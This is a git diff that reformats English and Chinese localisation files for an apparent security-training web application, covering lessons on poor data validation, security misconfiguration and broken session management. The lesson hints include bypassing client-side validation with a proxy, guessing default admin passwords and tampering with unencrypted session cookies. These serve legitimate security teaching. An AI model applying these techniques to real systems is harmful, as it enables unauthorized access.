-paragraph.info.1=\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1\u53D1\u751F\u5728\u5F53\u5E94\u7528\u7A0B\u5E8F\u4E0D\u6B63\u786E\u6216\u4E0D\u5145\u5206\u9A8C\u8BC1\u63D0\u4EA4\u7684\u6570\u636E.\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1\u95EE\u9898\u7684\u4E25\u91CD\u6027\u666E\u904D\u662F\u504F\u4F4E\u7684,\u4ED6\u4EEC\u66F4\u5BB9\u6613\u88AB\u52A0\u4E0A\u5176\u4ED6\u7684\u5B89\u5168\u98CE\u9669,\u6765\u589E\u5F3A\u81EA\u8EAB\u7684\u5F71\u54CD\u529B.\u5982\u679C\u6240\u6709\u63D0\u4EA4\u5230\u5E94\u7528\u7A0B\u5E8F\u7684\u6570\u636E\u662F\u88AB\u6B63\u786E\u9A8C\u8BC1\u7684,\u5B89\u5168\u98CE\u9669\u5C06\u660E\u663E\u5730\u66F4\u96BE\u5229\u7528.
-paragraph.info.2=\u653B\u51FB\u8005\u53EF\u4EE5\u5229\u7528\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1\u6765\u6267\u884C\u4E1A\u52A1\u903B\u8F91\u653B\u51FB\u6216\u9020\u6210\u670D\u52A1\u5668\u9519\u8BEF.
-paragraph.info.3=\u5F53\u6570\u636E\u88AB\u63D0\u4EA4\u5230\u4E00\u4E2Aweb\u5E94\u7528\u7A0B\u5E8F,\u8BE5\u6570\u636E\u5E94\u8BE5\u88AB\u786E\u4FDD\u662F\u5F3A\u7C7B\u578B\u7684,\u6709\u6B63\u786E\u7684\u8BED\u6CD5,\u662F\u5728\u4E00\u4E2A\u957F\u5EA6\u8303\u56F4\u5185\u7684,\u53EA\u5305\u542B\u5141\u8BB8\u7684\u5B57\u7B26\u548C\u5728\u8303\u56F4\u8FB9\u754C\u5185\u7684.\u6570\u636E\u9A8C\u8BC1\u8FC7\u7A0B\u5E94\u6700\u597D\u88AB\u6267\u884C\u5728\u5BA2\u6237\u7AEF,\u7136\u540E\u5728\u670D\u52A1\u5668\u7AEF.
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.loading=\u52A0\u8F7D
-button.submitNumber=\u63D0\u4EA4\u6570\u5B57
-button.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417
-challenge.description=\u4F60\u5FC5\u987B\u7ED5\u8FC7\u4EE5\u4E0B\u529F\u80FD\u7684\u9A8C\u8BC1\u5E76\u63D0\u4EA4\u4E00\u4E2A\u8D1F\u6570,\u624D\u80FD\u83B7\u5F97\u901A\u8FC7\u672C\u8BFE\u7684\u94A5\u5319.
-challenge.hintHeader=\u8BFE\u7A0B\u63D0\u793A
-challenge.hint=\u8BE5\u8BFE\u4EC5\u9A8C\u8BC1\u5728\u5BA2\u6237\u7AEF\u7684\u6570\u5B57. \u5728\u5B83\u79BB\u5F00\u6D4F\u89C8\u5668\u540E,\u5C1D\u8BD5\u4F7F\u7528\u4EE3\u7406\u6765\u6539\u53D8\u6570\u636E.
-challenge.enterNumber=\u8F93\u5165\u4E00\u4E2A\u6570\u5B57
-error.noNumber=\u5FC5\u987B\u63D0\u4EA4\u4E00\u4E2A\u6570\u5B57
-error.badNumber=\u65E0\u6548\u6570\u5B57: \u6570\u5B57\u5FC5\u987B\u5927\u4E8E 0
-error.occured=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
\ No newline at end of file
+title.question.poor_data_validation = \u4EC0\u4E48\u662F\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1?
+
+paragraph.info.1 = \u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1\u53D1\u751F\u5728\u5F53\u5E94\u7528\u7A0B\u5E8F\u4E0D\u6B63\u786E\u6216\u4E0D\u5145\u5206\u9A8C\u8BC1\u63D0\u4EA4\u7684\u6570\u636E.\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1\u95EE\u9898\u7684\u4E25\u91CD\u6027\u666E\u904D\u662F\u504F\u4F4E\u7684,\u4ED6\u4EEC\u66F4\u5BB9\u6613\u88AB\u52A0\u4E0A\u5176\u4ED6\u7684\u5B89\u5168\u98CE\u9669,\u6765\u589E\u5F3A\u81EA\u8EAB\u7684\u5F71\u54CD\u529B.\u5982\u679C\u6240\u6709\u63D0\u4EA4\u5230\u5E94\u7528\u7A0B\u5E8F\u7684\u6570\u636E\u662F\u88AB\u6B63\u786E\u9A8C\u8BC1\u7684,\u5B89\u5168\u98CE\u9669\u5C06\u660E\u663E\u5730\u66F4\u96BE\u5229\u7528.
+paragraph.info.2 = \u653B\u51FB\u8005\u53EF\u4EE5\u5229\u7528\u5931\u6548\u7684\u6570\u636E\u9A8C\u8BC1\u6765\u6267\u884C\u4E1A\u52A1\u903B\u8F91\u653B\u51FB\u6216\u9020\u6210\u670D\u52A1\u5668\u9519\u8BEF.
+paragraph.info.3 = \u5F53\u6570\u636E\u88AB\u63D0\u4EA4\u5230\u4E00\u4E2Aweb\u5E94\u7528\u7A0B\u5E8F,\u8BE5\u6570\u636E\u5E94\u8BE5\u88AB\u786E\u4FDD\u662F\u5F3A\u7C7B\u578B\u7684,\u6709\u6B63\u786E\u7684\u8BED\u6CD5,\u662F\u5728\u4E00\u4E2A\u957F\u5EA6\u8303\u56F4\u5185\u7684,\u53EA\u5305\u542B\u5141\u8BB8\u7684\u5B57\u7B26\u548C\u5728\u8303\u56F4\u8FB9\u754C\u5185\u7684.\u6570\u636E\u9A8C\u8BC1\u8FC7\u7A0B\u5E94\u6700\u597D\u88AB\u6267\u884C\u5728\u5BA2\u6237\u7AEF,\u7136\u540E\u5728\u670D\u52A1\u5668\u7AEF.
+
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.loading = \u52A0\u8F7D
+button.submitNumber = \u63D0\u4EA4\u6570\u5B57
+button.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417
+
+challenge.description = \u4F60\u5FC5\u987B\u7ED5\u8FC7\u4EE5\u4E0B\u529F\u80FD\u7684\u9A8C\u8BC1\u5E76\u63D0\u4EA4\u4E00\u4E2A\u8D1F\u6570,\u624D\u80FD\u83B7\u5F97\u901A\u8FC7\u672C\u8BFE\u7684\u94A5\u5319.
+challenge.hintHeader = \u8BFE\u7A0B\u63D0\u793A
+challenge.hint = \u8BE5\u8BFE\u4EC5\u9A8C\u8BC1\u5728\u5BA2\u6237\u7AEF\u7684\u6570\u5B57. \u5728\u5B83\u79BB\u5F00\u6D4F\u89C8\u5668\u540E,\u5C1D\u8BD5\u4F7F\u7528\u4EE3\u7406\u6765\u6539\u53D8\u6570\u636E.
+challenge.enterNumber = \u8F93\u5165\u4E00\u4E2A\u6570\u5B57
+
+error.noNumber = \u5FC5\u987B\u63D0\u4EA4\u4E00\u4E2A\u6570\u5B57
+error.badNumber = \u65E0\u6548\u6570\u5B57: \u6570\u5B57\u5FC5\u987B\u5927\u4E8E 0
+error.occured = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833.properties b/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833.properties
index d71a005cb..08b498e6b 100644
--- a/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833.properties
+++ b/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833.properties
@@ -1,15 +1,19 @@
-title.question.security_misconfig=Security Misconfiguration
-paragraph.info.1=Security misconfiguration can happen in any part of an application, from the database server, third-party libraries to custom code settings. A security misconfiguration is any configuration which can be exploited by an attacker to perform any action they should not be able to. The impact of these issues vary from which configuration is being exploited.
-paragraph.info.2=Attackers can exploit security misconfiguration by logging in with default log in credentials to the application, the operating system or any of the public services it is running (Such as Database or Samba services) to gain unauthorized access to or knowledge of the system. Attackers can also exploit bad security configurations through unpatched flaws, unprotected files and directories to gain unauthorized access to or knowledge of the system.
-paragraph.info.3=Developers and system administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts or unnecessary services. A process should be implemented for keeping all software up to date, with patches occurring in a timely manner to each deployed environment.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-button.hint=Would you like a hint?
-challenge.description=To get the result key to this lesson, you must sign in with the default admin credentials which were never removed or updated.
-challenge.hintHeader=Lesson Hint
-challenge.hint=The user name is admin. Try a series of generic passwords.
-challenge.userName=User Name
-challenge.password=Password
-challenge.signIn=Sign In
-challenge.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+title.question.security_misconfig = Security Misconfiguration
+
+paragraph.info.1 = Security misconfiguration can happen in any part of an application, from the database server, third-party libraries to custom code settings. A security misconfiguration is any configuration which can be exploited by an attacker to perform any action they should not be able to. The impact of these issues vary from which configuration is being exploited.
+paragraph.info.2 = Attackers can exploit security misconfiguration by logging in with default log in credentials to the application, the operating system or any of the public services it is running (Such as Database or Samba services) to gain unauthorized access to or knowledge of the system. Attackers can also exploit bad security configurations through unpatched flaws, unprotected files and directories to gain unauthorized access to or knowledge of the system.
+paragraph.info.3 = Developers and system administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts or unnecessary services. A process should be implemented for keeping all software up to date, with patches occurring in a timely manner to each deployed environment.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+button.hint = Would you like a hint?
+
+challenge.description = To get the result key to this lesson, you must sign in with the default admin credentials which were never removed or updated.
+challenge.hintHeader = Lesson Hint
+challenge.hint = The user name is admin. Try a series of generic passwords.
+challenge.userName = User Name
+challenge.password = Password
+challenge.signIn = Sign In
+challenge.loading = Loading
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833_zh.properties b/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833_zh.properties
index 6bddcb38a..af73d77ec 100644
--- a/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833_zh.properties
+++ b/src/main/resources/i18n/lessons/security_misconfig/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833_zh.properties
@@ -1,15 +1,19 @@
-title.question.security_misconfig=\u5B89\u5168\u914D\u7F6E\u9519\u8BEF
-paragraph.info.1=\u5B89\u5168\u914D\u7F6E\u9519\u8BEF\u53EF\u4EE5\u53D1\u751F\u5728\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u7684\u4EFB\u4F55\u90E8\u5206,\u4ECE\u6570\u636E\u5E93\u670D\u52A1\u5668,\u7B2C\u4E09\u65B9\u5E93\u5230\u81EA\u5B9A\u4E49\u4EE3\u7801\u8BBE\u7F6E.\u4E00\u4E2A\u5B89\u5168\u914D\u7F6E\u9519\u8BEF\u662F\u4EFB\u4F55\u53EF\u4EE5\u88AB\u653B\u51FB\u8005\u7528\u6765\u6267\u884C\u4ED6\u4EEC\u672C\u4E0D\u5E94\u8BE5\u6267\u884C\u7684\u4EFB\u4F55\u884C\u52A8\u7684\u914D\u7F6E.\u8FD9\u4E9B\u95EE\u9898\u7684\u5F71\u54CD\u7531\u6B63\u5728\u88AB\u4F7F\u7528\u7684\u914D\u7F6E\u800C\u53D8\u5316.
-paragraph.info.2=\u653B\u51FB\u8005\u53EF\u4EE5\u5229\u7528\u5B89\u5168\u914D\u7F6E\u9519\u8BEF\u901A\u8FC7\u9ED8\u8BA4\u767B\u5F55\u51ED\u8BC1\u767B\u5F55\u5230\u5E94\u7528\u7A0B\u5E8F,\u64CD\u4F5C\u7CFB\u7EDF\u6216\u4EFB\u4F55\u6B63\u5728\u8FD0\u884C\u7684\u516C\u5171\u670D\u52A1(\u6BD4\u5982\u6570\u636E\u5E93\u6216Samba\u670D\u52A1)\u83B7\u5F97\u672A\u7ECF\u6388\u6743\u7684\u8BBF\u95EE\u6216\u7CFB\u7EDF\u7684\u77E5\u8BC6. \u653B\u51FB\u8005\u53EF\u4EE5\u4F7F\u7528\u4E0D\u597D\u7684\u5B89\u5168\u914D\u7F6E\u901A\u8FC7\u672A\u4FEE\u8865\u7684\u6F0F\u6D1E,\u672A\u53D7\u4FDD\u62A4\u7684\u6587\u4EF6\u548C\u76EE\u5F55\u83B7\u53D6\u672A\u7ECF\u6388\u6743\u7684\u8BBF\u95EE\u6216\u7CFB\u7EDF\u7684\u77E5\u8BC6.
-paragraph.info.3=\u5F00\u53D1\u4EBA\u5458\u548C\u7CFB\u7EDF\u7BA1\u7406\u5458\u9700\u5171\u540C\u52AA\u529B,\u4EE5\u786E\u4FDD\u6574\u4E2A\u5806\u53E0\u662F\u914D\u7F6E\u6B63\u786E\u7684.\u81EA\u52A8\u626B\u63CF\u4EEA\u7528\u4E8E\u68C0\u6D4B\u5931\u8E2A\u7684\u8865\u4E01\uFF0C\u9519\u8BEF\u914D\u7F6E,\u9ED8\u8BA4\u5E10\u6237\u4F7F\u7528\u6216\u4E0D\u5FC5\u8981\u7684\u670D\u52A1\u662F\u975E\u5E38\u6709\u7528\u7684.\u4E00\u4E2A\u8FDB\u7A0B\u5E94\u4FDD\u6301\u6240\u6709\u7684\u8F6F\u4EF6\u4E3A\u6700\u65B0\u72B6\u6001\u548C\u53CA\u65F6\u5730\u6253\u8865\u4E01\u5728\u6BCF\u4E2A\u90E8\u7F72\u73AF\u5883\u4E2D.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-button.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-challenge.description=\u4F60\u5FC5\u987B\u7528\u9ED8\u8BA4\u7684\u4ECE\u672A\u5220\u9664\u6216\u66F4\u65B0\u7684\u7BA1\u7406\u5458\u51ED\u636E\u767B\u5F55,\u624D\u80FD\u83B7\u53D6\u672C\u8BFE\u7684\u94A5\u5319.
-challenge.hintHeader=\u8BFE\u7A0B\u63D0\u793A
-challenge.hint=\u8BE5\u7528\u6237\u540D\u79F0\u662F admin. \u5C1D\u8BD5\u4E00\u7CFB\u5217\u7684\u901A\u7528\u5BC6\u7801.
-challenge.userName=\u7528\u6237\u540D\u79F0
-challenge.password=\u5BC6\u7801
-challenge.signIn=\u767B\u5165
-challenge.loading=\u52A0\u8F7D\u4E2D
-error.occurred=\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
+title.question.security_misconfig = \u5B89\u5168\u914D\u7F6E\u9519\u8BEF
+
+paragraph.info.1 = \u5B89\u5168\u914D\u7F6E\u9519\u8BEF\u53EF\u4EE5\u53D1\u751F\u5728\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u7684\u4EFB\u4F55\u90E8\u5206,\u4ECE\u6570\u636E\u5E93\u670D\u52A1\u5668,\u7B2C\u4E09\u65B9\u5E93\u5230\u81EA\u5B9A\u4E49\u4EE3\u7801\u8BBE\u7F6E.\u4E00\u4E2A\u5B89\u5168\u914D\u7F6E\u9519\u8BEF\u662F\u4EFB\u4F55\u53EF\u4EE5\u88AB\u653B\u51FB\u8005\u7528\u6765\u6267\u884C\u4ED6\u4EEC\u672C\u4E0D\u5E94\u8BE5\u6267\u884C\u7684\u4EFB\u4F55\u884C\u52A8\u7684\u914D\u7F6E.\u8FD9\u4E9B\u95EE\u9898\u7684\u5F71\u54CD\u7531\u6B63\u5728\u88AB\u4F7F\u7528\u7684\u914D\u7F6E\u800C\u53D8\u5316.
+paragraph.info.2 = \u653B\u51FB\u8005\u53EF\u4EE5\u5229\u7528\u5B89\u5168\u914D\u7F6E\u9519\u8BEF\u901A\u8FC7\u9ED8\u8BA4\u767B\u5F55\u51ED\u8BC1\u767B\u5F55\u5230\u5E94\u7528\u7A0B\u5E8F,\u64CD\u4F5C\u7CFB\u7EDF\u6216\u4EFB\u4F55\u6B63\u5728\u8FD0\u884C\u7684\u516C\u5171\u670D\u52A1(\u6BD4\u5982\u6570\u636E\u5E93\u6216Samba\u670D\u52A1)\u83B7\u5F97\u672A\u7ECF\u6388\u6743\u7684\u8BBF\u95EE\u6216\u7CFB\u7EDF\u7684\u77E5\u8BC6. \u653B\u51FB\u8005\u53EF\u4EE5\u4F7F\u7528\u4E0D\u597D\u7684\u5B89\u5168\u914D\u7F6E\u901A\u8FC7\u672A\u4FEE\u8865\u7684\u6F0F\u6D1E,\u672A\u53D7\u4FDD\u62A4\u7684\u6587\u4EF6\u548C\u76EE\u5F55\u83B7\u53D6\u672A\u7ECF\u6388\u6743\u7684\u8BBF\u95EE\u6216\u7CFB\u7EDF\u7684\u77E5\u8BC6.
+paragraph.info.3 = \u5F00\u53D1\u4EBA\u5458\u548C\u7CFB\u7EDF\u7BA1\u7406\u5458\u9700\u5171\u540C\u52AA\u529B,\u4EE5\u786E\u4FDD\u6574\u4E2A\u5806\u53E0\u662F\u914D\u7F6E\u6B63\u786E\u7684.\u81EA\u52A8\u626B\u63CF\u4EEA\u7528\u4E8E\u68C0\u6D4B\u5931\u8E2A\u7684\u8865\u4E01\uFF0C\u9519\u8BEF\u914D\u7F6E,\u9ED8\u8BA4\u5E10\u6237\u4F7F\u7528\u6216\u4E0D\u5FC5\u8981\u7684\u670D\u52A1\u662F\u975E\u5E38\u6709\u7528\u7684.\u4E00\u4E2A\u8FDB\u7A0B\u5E94\u4FDD\u6301\u6240\u6709\u7684\u8F6F\u4EF6\u4E3A\u6700\u65B0\u72B6\u6001\u548C\u53CA\u65F6\u5730\u6253\u8865\u4E01\u5728\u6BCF\u4E2A\u90E8\u7F72\u73AF\u5883\u4E2D.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+button.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+
+challenge.description = \u4F60\u5FC5\u987B\u7528\u9ED8\u8BA4\u7684\u4ECE\u672A\u5220\u9664\u6216\u66F4\u65B0\u7684\u7BA1\u7406\u5458\u51ED\u636E\u767B\u5F55,\u624D\u80FD\u83B7\u53D6\u672C\u8BFE\u7684\u94A5\u5319.
+challenge.hintHeader = \u8BFE\u7A0B\u63D0\u793A
+challenge.hint = \u8BE5\u7528\u6237\u540D\u79F0\u662F admin. \u5C1D\u8BD5\u4E00\u7CFB\u5217\u7684\u901A\u7528\u5BC6\u7801.
+challenge.userName = \u7528\u6237\u540D\u79F0
+challenge.password = \u5BC6\u7801
+challenge.signIn = \u767B\u5165
+challenge.loading = \u52A0\u8F7D\u4E2D
+
+error.occurred = \u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
diff --git a/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806.properties b/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806.properties
index d0d8ead1c..34bb3ef35 100644
--- a/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806.properties
+++ b/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806.properties
@@ -1,24 +1,27 @@
-title.question.session_manage=What is Broken Authentication and Session Management?
-paragraph.info.1=Attacks against an application's authentication and session management can be performed using security risks that other vulnerabilities present. For example, any application's session management can be overcome when a Cross Site Scripting vulnerability is used to steal user session tokens. This topic is more about flaws that exist in the applications authentication and session management schema.
-paragraph.info.2=Broken authentication and session management flaws are commonly found in functionalities such as logout, password management, secret question and account update. An attack can potentially abuse these functions to modify other users credentials by guessing their secret question or through parameter abuse. Finding such flaws can sometimes be difficult, as each implementation is unique.
-paragraph.info.3=The following scenarios are vulnerable to these security risks;
-paragraph.info.number.1=1)
-paragraph.info.number.2=2)
-paragraph.info.number.3=3)
-paragraph.info.number.4=4)
-paragraph.info.number.5=5)
-paragraph.info.1.1=User credentials are stored with insufficient cryptographic levels.
-paragraph.info.2.2=User credentials can be guessed or changed through poor account management.
-paragraph.info.3.3=Session identifiers are exposed in the URL.
-paragraph.info.4.4=The application does not use sufficient transport protection (Such as HTTPs or sFTP).
-paragraph.info.5.5=Session parameters can be manually changed by the user through application functionality.
-paragraph.info.6=Broken authentication and session management flaws allow an attacker to potentially compromise every account across an application. Once the attack has been performed, the attacker has the ability to do anything the user could do. For this reason, privileged accounts, such as administrators, are targeted.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=This lesson implements bad session management. Investigate the following function to see if you trick the server into thinking you have already completed this lesson to retrieve the result key.
-hint.title=Lesson Hint
-lesson.hint.1=This lesson stores unencrypted session information in a user's cookies
-complete.button=Complete This Lesson
-word.info.loading=Loading...
-sign.hint=Would you link a hint?
-generic.error=An Error Occurred:
+title.question.session_manage = What is Broken Authentication and Session Management?
+
+paragraph.info.1 = Attacks against an application's authentication and session management can be performed using security risks that other vulnerabilities present. For example, any application's session management can be overcome when a Cross Site Scripting vulnerability is used to steal user session tokens. This topic is more about flaws that exist in the applications authentication and session management schema.
+paragraph.info.2 = Broken authentication and session management flaws are commonly found in functionalities such as logout, password management, secret question and account update. An attack can potentially abuse these functions to modify other users credentials by guessing their secret question or through parameter abuse. Finding such flaws can sometimes be difficult, as each implementation is unique.
+paragraph.info.3 = The following scenarios are vulnerable to these security risks;
+paragraph.info.number.1 = 1)
+paragraph.info.number.2 = 2)
+paragraph.info.number.3 = 3)
+paragraph.info.number.4 = 4)
+paragraph.info.number.5 = 5)
+paragraph.info.1.1 = User credentials are stored with insufficient cryptographic levels.
+paragraph.info.2.2 = User credentials can be guessed or changed through poor account management.
+paragraph.info.3.3 = Session identifiers are exposed in the URL.
+paragraph.info.4.4 = The application does not use sufficient transport protection (Such as HTTPs or sFTP).
+paragraph.info.5.5 = Session parameters can be manually changed by the user through application functionality.
+paragraph.info.6 = Broken authentication and session management flaws allow an attacker to potentially compromise every account across an application. Once the attack has been performed, the attacker has the ability to do anything the user could do. For this reason, privileged accounts, such as administrators, are targeted.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = This lesson implements bad session management. Investigate the following function to see if you trick the server into thinking you have already completed this lesson to retrieve the result key.
+hint.title = Lesson Hint
+lesson.hint.1 = This lesson stores unencrypted session information in a user's cookies
+complete.button = Complete This Lesson
+word.info.loading = Loading...
+sign.hint = Would you link a hint?
+generic.error = An Error Occurred:
diff --git a/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806_zh.properties b/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806_zh.properties
index 71b459845..a7312abfa 100644
--- a/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806_zh.properties
+++ b/src/main/resources/i18n/lessons/session_manage/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806_zh.properties
@@ -1,24 +1,27 @@
-title.question.session_manage=\u4EC0\u4E48\u662F\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406?
-paragraph.info.1=\u5BF9\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u653B\u51FB\u53EF\u4EE5\u88AB\u6267\u884C,\u901A\u8FC7\u4F7F\u7528\u90A3\u4E9B\u5176\u4ED6\u6F0F\u6D1E\u663E\u793A\u7684\u5B89\u5168\u98CE\u9669.\u6BD4\u5982\u8BF4,\u4EFB\u4F55\u5E94\u7528\u7A0B\u5E8F\u7684\u4F1A\u8BDD\u7BA1\u7406\u53EF\u4EE5\u5728\u4E00\u4E2A\u8DE8\u7AD9\u811A\u672C\u653B\u51FB\u6F0F\u6D1E\u88AB\u7528\u4E8E\u7A83\u53D6\u7528\u6237\u7684\u4F1A\u8BDDToken\u88AB\u514B\u670D.\u8BE5\u4E3B\u9898\u66F4\u591A\u7684\u5173\u4E8E\u7F3A\u9677\u662F\u5B58\u5728\u4E8E\u5E94\u7528\u7A0B\u5E8F\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u6A21\u5F0F.
-paragraph.info.2=\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u7F3A\u9677\u901A\u5E38\u88AB\u53D1\u73B0\u5728\u529F\u80FD\u4E0A,\u5982\u6CE8\u9500,\u5BC6\u7801\u7BA1\u7406,\u5BC6\u7801\u63D0\u793A\u95EE\u9898\u548C\u5E10\u6237\u66F4\u65B0.\u4E00\u4E2A\u653B\u51FB\u53EF\u4EE5\u901A\u8FC7\u731C\u6D4B\u4ED6\u4EEC\u7684\u5BC6\u7801\u63D0\u793A\u95EE\u9898\u6216\u901A\u8FC7\u53C2\u6570\u6EE5\u7528,\u53EF\u80FD\u6EE5\u7528\u8FD9\u4E9B\u529F\u80FD\u53BB\u4FEE\u6539\u5176\u4ED6\u7528\u6237\u51ED\u8BC1.\u6709\u65F6\u4FAF\u8981\u627E\u51FA\u8FD9\u4E9B\u7F3A\u9677\u662F\u6BD4\u8F83\u56F0\u96BE\u7684,\u56E0\u4E3A\u6BCF\u4E00\u4E2A\u5B9E\u73B0\u90FD\u662F\u552F\u4E00\u7684.
-paragraph.info.3=\u4EE5\u4E0B\u51E0\u79CD\u60C5\u51B5\u5F88\u5BB9\u6613\u53D7\u5230\u8FD9\u4E9B\u5B89\u5168\u98CE\u9669;
-paragraph.info.number.1=1)
-paragraph.info.number.2=2)
-paragraph.info.number.3=3)
-paragraph.info.number.4=4)
-paragraph.info.number.5=5)
-paragraph.info.1.1=\u7528\u6237\u51ED\u8BC1\u4EE5\u4E0D\u5145\u5206\u7684 \u52A0\u5BC6\u6280\u672F\u6C34\u5E73\u50A8\u5B58.
-paragraph.info.2.2=\u53EF\u4EE5\u901A\u8FC7\u5931\u6548\u7684\u5E10\u6237\u7BA1\u7406\u731C\u6D4B\u6216\u66F4\u6539\u7528\u6237\u51ED\u8BC1.
-paragraph.info.3.3=\u4F1A\u8BDD\u6807\u8BC6\u7B26\u88AB\u66B4\u9732\u5728URL\u4E2D.
-paragraph.info.4.4=\u8BE5\u5E94\u7528\u7A0B\u5E8F\u6CA1\u6709\u4F7F\u7528\u5145\u5206\u7684\u4F20\u8F93\u4FDD\u62A4(\u5982HTTPs\u6216sFTP)
-paragraph.info.5.5=\u7528\u6237\u53EF\u4EE5\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u7684\u529F\u80FD\u624B\u52A8\u66F4\u6539\u4F1A\u8BDD\u53C2\u6570.
-paragraph.info.6=\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u548C\u4F1A\u8BDD\u7BA1\u7406\u6F0F\u6D1E\u5141\u8BB8\u653B\u51FB\u8005\u53EF\u80FD\u635F\u5BB3\u6574\u4E2A\u5E94\u7528\u7A0B\u5E8F\u7684\u6BCF\u4E2A\u5E10\u6237.\u4E00\u65E6\u653B\u51FB\u88AB\u6267\u884C,\u653B\u51FB\u8005\u5C31\u62E5\u6709\u548C\u7528\u6237\u4E00\u6837\u7684\u6743\u9650.\u51FA\u4E8E\u8FD9\u4E2A\u539F\u56E0\uFF0C\u7279\u6743\u5E10\u6237\u6210\u4E3A\u653B\u51FB\u76EE\u6807,\u5982\u7BA1\u7406\u5458.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u8BE5\u8BFE\u7A0B\u91C7\u7528\u4E86\u4E0D\u597D\u7684\u4F1A\u8BDD\u7BA1\u7406,\u8C03\u67E5\u5982\u4E0B\u529F\u80FD\u6765\u67E5\u770B\u4F60\u662F\u5426\u53EF\u4EE5\u6B3A\u9A97\u670D\u52A1\u5668,\u8BA9\u670D\u52A1\u5668\u8BA4\u4E3A\u4F60\u5DF2\u7ECF\u5B8C\u6210\u8BE5\u8BFE\u7A0B\u5E76\u53EF\u4EE5\u83B7\u5F97\u94A5\u5319.
-hint.title=\u8BFE\u7A0B\u63D0\u793A
-lesson.hint.1=\u8BE5\u8BFE\u7A0B\u5B58\u50A8\u672A\u52A0\u5BC6\u7684\u4F1A\u8BDD\u4FE1\u606F\u5728\u4E00\u4E2A\u7528\u6237Cookie\u4E2D.
-complete.button=\u5B8C\u6210\u8BE5\u8BFE\u7A0B
-word.info.loading=\u8BF7\u68A2\u4FAF...
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
